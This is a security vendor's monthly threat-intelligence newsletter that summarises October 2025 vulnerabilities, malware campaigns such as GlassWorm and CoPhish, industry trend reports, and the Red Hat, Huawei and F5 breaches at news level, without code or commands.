Threat Pulse – October 2025

Each month, DigitalXRAID’s Security Operations Centre (SOC) analysts share the top threats affecting businesses globally. Take action to protect your organisation against these prolific threats.

If you’ve been affected by any of these threats, we’re here to help. You can call our Cyber Emergency line any time of the day or night for help with active cyberattacks.

DigitalXRAID’s SOC analysts constantly monitor for zero-day threats and update our signature databases using the most comprehensive Threat Intelligence and Open Threat Exchange databases available worldwide.

Global Overview

CISA and NSA Issue Urgent Guidance to Secure WSUS and Microsoft Exchange Servers

The US Cyber Security and Infrastructure Security Agency (CISA) and the National Security Agency (NSA), along with partners from Australia and Canada, have issued urgent guidance to secure on-premise Microsoft Exchange Servers and Windows Server Update Services (WSUS) against active exploitation.

The guidance emphasises best practices such as restricting administrative access, enabling multi-factor authentication (MFA), and adopting zero trust principles.

This follows the discovery of CVE-2025-59287, a critical vulnerability in WSUS that has been exploited to harvest sensitive data from various organisations in the US.

Threat actors have used base64-encoded PowerShell commands to exfiltrate data, and researchers warn that this may be part of a broader reconnaissance effort. Organisations are urged to apply patches, monitor suspicious activity, and harden their systems to prevent further attacks.

New CoPhish attack steals OAuth tokens via Copilot Studio agents

Security researchers identified ‘CoPhish’ a technique that weaponises Microsoft Copilot Studio agents to deliver fraudulent OAuth consent requests via legitimate and trusted Microsoft domains. Microsoft have confirmed this will be fixed with future updates.

This attack uses Agents shared on Microsoft’s domain by enabling the “demo website” feature. Because the URL is a legitimate one, it’s easier for a user to fall for the trick and log in. The login button can be customised with custom actions which can include requesting a verification code or redirecting to another location or service (mainly to the Burp Collaborator to collect the session token).

Targeting an unprivileged user in the tenant is currently possible if the threat actor is already present in the environment. When Microsoft’s default policy changes, the attack would be limited only to OneNote read/write permissions and close the gap for email, chat, and calendar services.

Self-Spreading ‘GlassWorm’ Infects VS Code Extensions in Supply Chain Attacks

Cyber security researchers have uncovered GlassWorm, a self-spreading malware that hides in VS Code extensions.

The malware hides its malicious code using invisible characters, and uses the blockchain Solana for command-and-control. Once installed, the malware attempts to steal credentials for GitHub, npm, and OpenVSX accounts, and installs a module named ‘ZOMBI’ that grants the threat actor remote access to the device.

Researchers found 14 compromised extensions on Microsoft’s VS Marketplace, in total these extensions have been downloaded over 35,000 times.

Hackers Deploy Linux Rootkits via Cisco SNMP Flaw in ‘Zero Disco’ Attacks

Researchers have identified Operation Zero Disco, a campaign exploiting a flaw in Cisco IOS and IOS XE Software to deploy Linux rootkits on vulnerable systems.

The attackers used CVE-2025-20352, a stack overflow in the SNMP subsystem, to gain remote code execution.

Although Cisco has since patched the issue, it was already used as a zero-day against Cisco 9400, 9300, and 3750G devices, enabling persistent unauthorised access via the IOS daemon.

Google ads for fake Homebrew, LogMeIn sites push infostealers

A new malicious campaign is targeting macOS developers using fake versions of Homebrew, LogMeIn, and TradingView to distribute information stealing malware such as AMOS (Atomic macOS Stealer) and Odyssey.

The attackers use a “ClickFix” technique, deceiving victims into running commands in Terminal, which leads to their systems becoming infected.

The UK is increasingly a target for cyberattacks

The National Cyber Security Centre (NCSC) Annual Review 2025 (released mid-October) reported that the UK had experienced 204 “nationally significant” cyberattacks in the year, up from 89 the prior year. The review specifically flagged critical infrastructure providers among those vulnerable, noting a growing gap between the scale and sophistication of threats and the ability of CNI sectors to defend them.

On 24 October the UK government issued new guidance in collaboration with Singapore, under the Counter Ransomware Initiative, aimed at strengthening resilience of “critical businesses and services” from ransomware attacks and supply-chain compromise.

The guidance underscores that CNI operators must scrutinise supplier and vendor cyber-security postures, pointing to the fact that attackers are exploiting vendor-links into infrastructure systems.

Cyber Trends for the Month

Ransomware and extortion remain central

The law-firm Mayer Brown reports a ~12% year-over-year increase in ransomware related breaches, with attackers using more aggressive extortion tactics.

Major ransomware groups such as LockBit continue to upgrade toolkits and expand affiliate programmes.

Implication: Organisations must assume they may be targeted, focus on backup resilience, incident-response readiness, and data-extortion preparations.

AI/malware-free and stealthy intrusions

According to CrowdStrike’s 2025 Global Threat Report, 79% of detections in 2024 were malware-free, for example fileless or living-off-the-land attacks.

Emerging research on “agentic” AI systems shows threat actors increasingly use autonomous/LLM-agents for attack automation.

Implication: Traditional signature-based defences are insufficient. Organisations must deploy behavioural analytics, identity-based controls and detection of anomalous activity capabilities to mitigate against these attacks.

Sectors under increased targeting and regulatory implications

The European Union Agency for Cybersecurity (ENISA) Threat Landscape 2025 covers ~4,875 incidents in the IT and Technology sector over just two months, and highlights key threat vectors.

A UK regulatory outlook released by Osborne Clarke notes that “essential” entities under the NIS2 Directive accounted for 53% of recorded incidents; key sectors: public administration, transport, digital infrastructure, finance, manufacturing.

Implication: Organisations in these sectors must assume heightened regulatory scrutiny and incident response expectations. Cyber risk is business risk.

Exposure management, tech-debt and data silos

The Ivanti 2025 “State of Cybersecurity” report highlights key internal issues:

• “Exposure management” vs classic vulnerability management
• Damage from data silos — fragmented responsibility and visibility

Implication: Cyber security strategy must go beyond tools. Organisations need strong governance, architecture (data, identity, process) and cultural alignment.

Rapid evolution of attack surface via AI and autonomous systems

Recent research has emphasised how autonomous LLM agents and AI systems can introduce novel security gaps e.g. prompt injection, adversarial AI, rogue agents.

Implication: As businesses adopt AI, attackers will mirror. Organisations must treat AI systems as part of the attack surface, not just as business tooling. Defences need to cover AI agent behaviour, supply-chain, and trustworthiness.

Geopolitical/State-linked cyber operations rising

Recent news highlights the increase in state linked cyber activity, including Microsoft reports that Russia, China, Iran, North Korea are using AI to ramp up cyberattacks.

Implication: Cyber risk isn’t purely criminal. Nation-state and hybrid operations blur lines. Organisations must look at threat modelling including geopolitical risk, supply-chain contamination, and critical infrastructure exposures.

Ransomware surge targeting healthcare vendors

In mid-October 2025, a new report from Industrial Cyber and Comparitech revealed a sharp increase in ransomware attacks against healthcare businesses and technology vendors supporting medical services. The data showed that while direct attacks on hospitals and clinics had stabilised, incidents involving health tech vendors, billing providers, and supply-chain partners had risen by roughly 30% year-on-year.

The report noted that cybercriminal groups are shifting their focus away from large, highly protected hospital networks and instead targeting third-party service providers that store or process patient information on behalf of multiple organisations.

Implication: This shift means that a single breach in a vendor’s environment can now compromise data from dozens or even hundreds of healthcare entities. The findings underscored the urgent need for healthcare organisations to strengthen third-party risk management, conduct independent security assessments of partners, and ensure that data shared externally is properly encrypted and monitored.

Cyber Incidents in October

Red Hat Consulting breach (disclosed 2 October 2025)

In early October 2025, Red Hat confirmed that its consulting division suffered a significant security breach. Threat actors gained unauthorised access to a self-managed GitLab instance used internally by Red Hat Consulting. The attackers reportedly stole around 570 GB of compressed data from approximately 28,000 internal repositories.

Among the stolen information was about 800 “Customer Engagement Reports” (CERs) that included sensitive data such as infrastructure diagrams, configuration files, tokens, and credentials.

The breach was claimed by a group calling itself the Crimson Collective, which later published directory listings of the compromised repositories. The stolen material potentially affects hundreds of enterprise and government clients that rely on Red Hat’s consulting services. Analysts described this as a classic supply-chain compromise, since attackers targeted the consulting arm of a trusted technology vendor to gain indirect access to downstream clients.

Huawei source-code leak claims (reported 6–9 October 2025)

Reports emerged that Huawei Technologies had allegedly been breached by unknown threat actors who claimed to have exfiltrated internal source code, development tools, and firmware libraries. The attackers posted samples of the data on underground forums and offered it for sale.

At the time, Huawei neither confirmed nor denied the intrusion, and cyber security researchers were still attempting to verify the authenticity of the leaked materials. If genuine, the incident would represent a major case of intellectual-property (IP) theft in the global telecom and technology equipment sector, potentially exposing details of critical firmware and network infrastructure code.

F5 Networks breach (disclosed 20 October 2025)

On 20 October 2025, F5 Networks publicly disclosed that it had suffered a long running cyber intrusion, attributed to a nation-state linked threat actor.

The attackers accessed internal systems and stole sensitive intellectual property, including portions of the source code for its BIG-IP application delivery and security products.

Because F5 appliances are deployed globally by enterprises, cloud providers, and government agencies, the breach drew immediate concern from CISA.

CISA issued an emergency directive urging organisations using F5 products to review configurations and apply updated security guidance. Industry observers warned that knowledge of the exposed source code could allow attackers to identify and exploit new vulnerabilities in thousands of production systems worldwide.

DigitalXRAID exists to ensure that the bad guys don’t win. We’re driven and motivated to protect customers. Our expertise and unrivalled service means we can take care of your security, while you take care of business.

Talk to the team to see how you can start protecting your business against cyberattacks today.